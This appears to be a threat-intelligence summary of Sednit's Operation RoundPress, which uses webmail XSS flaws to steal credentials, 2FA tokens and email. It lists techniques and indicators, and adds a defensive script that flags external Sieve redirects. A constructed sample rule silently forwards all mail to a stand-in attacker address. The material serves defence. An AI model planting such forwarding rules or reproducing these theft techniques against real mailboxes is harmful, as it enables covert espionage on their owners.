ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
Analysis Summary
# Threat Actor: Sednit (Operation RoundPress)
## Attribution & Identity
The operation, named **RoundPress**, is assessed with medium confidence to be run by the **Sednit** cyberespionage group.
**Known Aliases/Associations:** APT28, Fancy Bear, Forest Blizzard, Sofacy. Linked by the US DOJ to the GRU. Historically associated with the DNC hack (2016), TV5Monde hacking, and WADA email leak.
## Activity Summary
Operation RoundPress focuses on compromising high-value webmail servers to steal confidential data from targeted email accounts.
* **Initial Access Vector:** Spearphishing emails leveraging Cross-Site Scripting (XSS) vulnerabilities to inject malicious JavaScript code into the victim’s webmail page interface.
* **Campaign Evolution:** In 2023, the operation primarily targeted **Roundcube**. In 2024, it expanded to target **Horde**, **MDaemon**, and **Zimbra**.
* **Zero-Day Use:** Sednit used a zero-day XSS vulnerability against MDaemon; the vendor patched it on November 1st in version 24.5.1.
* **Historical Links:** Infrastructure links (domain/IP configuration similarity) connect Operation RoundPress to previous Sednit campaigns exploiting CVE-2023-23397. Spearphishing used an envelope-from address similar to other Sednit campaigns.
## Tactics, Techniques & Procedures
The primary payloads observed are the **SpyPress** variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, SpyPress.ZIMBRA), which are noted to be obfuscated.
- **Initial Access (via XSS Injection):** Exploiting client-side vulnerabilities in webmail software (Roundcube - e.g., CVE-2023-43770, CVE-2020-35730; also Horde, MDaemon (zero-day), Zimbra).
- **Credential Access:**
  - Forced Authentication to induce credential entry (T1187).
  - Web Portal Capture: Creating hidden login forms to capture credentials, tricking browsers/password managers (T1056.003).
  - Multi-Factor Authentication Bypass: SpyPress.MDAEMON steals 2FA tokens and creates application passwords (T1556.006).
- **Discovery:** Account Discovery focusing on collecting email account information, such as contact lists (T1087.003).
- **Collection:** Automated collection of credentials and email messages (T1119). Remote Email Collection via mailbox scraping (T1114.002). Email Forwarding Rule setup: SpyPress.MDAEMON adds a Sieve rule to forward incoming email to an attacker-controlled address (T1114.003).
- **Command & Control:** HTTPS communication (T1071.001). Exfiltration via mail protocols/forwarding rules (T1071.003).
- **Exfiltration:** Automated Exfiltration (T1020) and Exfiltration Over C2 Channel (T1041). Data is base64 encoded before C2 transmission (T1132.001).
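The Sieve forwarding rule noted under Collection is one of the few artefacts of this activity that persists on the mail server after the injected script is gone. The following is an added example (not ESET's code and not part of the original report) of an audit that scans users' Sieve scripts for `redirect` actions pointing outside the organisation's domains, distinguishing blanket top-level redirects from conditional ones and noting whether `:copy` was used to hide the forwarding from the victim. The sample scripts, the mailbox names and the `example.gov` internal domain are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample Sieve scripts keyed by mailbox (not real data).
SAMPLE_SCRIPTS = {
    "alice@example.gov": (
        'require ["fileinto"];\n'
        'if header :contains "subject" "newsletter" {\n'
        '  fileinto "Lists";\n'
        '}\n'
    ),
    "bob@example.gov": (
        'require ["copy"];\n'
        '# :copy keeps the original in the mailbox, so the victim notices nothing\n'
        'redirect :copy "collector@mail-attacker.example";\n'
        'if address :is "from" "boss@example.gov" {\n'
        '  redirect "boss-archive@example.gov";\n'
        '}\n'
    ),
}

# Domains whose addresses count as internal (assumption for this example).
INTERNAL_DOMAINS = {"example.gov"}

# Sieve comments: '#' to end of line, or /* ... */ blocks (RFC 5228, section 2.3).
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.DOTALL)
# A redirect action, optional tagged arguments such as :copy, then a quoted address.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    mailbox: str
    target: str
    keeps_copy: bool      # :copy leaves the message in place, hiding the forwarding
    unconditional: bool   # redirect sits at top level, outside any 'if' block


def strip_comments(script: str) -> str:
    # Sufficient for an audit; a '#' inside a string literal would be over-stripped.
    return COMMENT_RE.sub("", script)


def is_external(address: str, internal_domains: set[str]) -> bool:
    domain = address.rsplit("@", 1)[-1].lower()
    return domain not in internal_domains


def find_external_redirects(mailbox: str, script: str, internal_domains: set[str]) -> list[Finding]:
    cleaned = strip_comments(script)
    findings: list[Finding] = []
    for match in REDIRECT_RE.finditer(cleaned):
        tags = [t.lower() for t in match.group(1).split()]
        target = match.group(2)
        if not is_external(target, internal_domains):
            continue
        # Brace depth before the action tells us whether it is inside a conditional block;
        # a top-level redirect forwards every incoming message.
        prefix = cleaned[: match.start()]
        depth = prefix.count("{") - prefix.count("}")
        findings.append(Finding(mailbox, target, ":copy" in tags, depth == 0))
    return findings


def audit_scripts(scripts: dict[str, str], internal_domains: set[str] = INTERNAL_DOMAINS) -> list[Finding]:
    findings: list[Finding] = []
    for mailbox, script in scripts.items():
        findings.extend(find_external_redirects(mailbox, script, internal_domains))
    return findings


if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_SCRIPTS):
        severity = "HIGH" if f.unconditional else "MEDIUM"
        print(f"[{severity}] {f.mailbox}: redirect to external {f.target} (copy={f.keeps_copy})")
```

In practice the scripts would be read from the server's Sieve storage on a schedule and the findings diffed against the previous run, so that a rule appearing on an account shortly after a spearphishing wave stands out.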
## Targeting
The primary objective is espionage and data theft from high-value email accounts.
- **Sectors:** Governmental entities, Defense companies, Military, Telecommunications (defense sector), Academic (environmental studies), Civil air transport company.
- **Geography:** Eastern Europe (primary focus, especially related to the war in Ukraine), Africa, Europe (General), South America. Specific countries observed include Ukraine, Romania, Bulgaria, Greece, Cameroon, Ecuador, and Serbia.
- **Victims:** Governmental entities and defense companies in Eastern Europe that are producing Soviet-era weapons destined for Ukraine. Specific entities include the Specialized Prosecutor’s Office in the Field of Defense of the Western Region (Ukraine).
## Tools & Infrastructure
- **Malware families used:** SpyPress payloads (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, SpyPress.ZIMBRA).
- **Infrastructure (C2/Domains):**
  - Observed spearphishing envelope-from address: katecohen1984@portugalmail[.]pt
  - Associated infrastructure used in 2023 (via link analysis):
    - 45.138.87[.]250 / ceriossl[.]info
    - 77.243.181[.]238 / global-world-news[.]net
## Implications
Sednit remains a highly capable and persistent threat actor focused on obtaining sensitive state and defense-related information, particularly concerning geopolitical conflicts (e.g., the war in Ukraine). Their willingness to leverage zero-day vulnerabilities (as seen with MDaemon) and pivot rapidly across different, commonly used webmail platforms (Roundcube, Horde, Zimbra) indicates a proactive and adaptive approach to compromise. The inclusion of 2FA bypass capabilities significantly raises the severity of successful breaches.
## Mitigations
- **Vulnerability Management:** Promptly patch all webmail servers against known XSS vulnerabilities (for MDaemon, upgrade to version 24.5.1, which fixes the zero-day). Monitor for new vulnerabilities affecting Roundcube, Horde, MDaemon, and Zimbra.
- **Email Security:** Enhance detection capabilities for spearphishing, specifically analyzing links/attachments within emails targeting webmail access.
- **Authentication Hardening:** Since SpyPress.MDAEMON achieves MFA bypass via token theft/app password creation, organizations must strictly enforce hardware tokens or modern phishing-resistant MFA mechanisms where possible.
- **Client-Side Defenses:** Implement Content Security Policies (CSP) on web applications if feasible, and restrict active content execution where webmail is hosted.
- **Credential Harvesting Detection:** Monitor for sudden user logouts followed by credential entry or unusual credential submissions via web portals.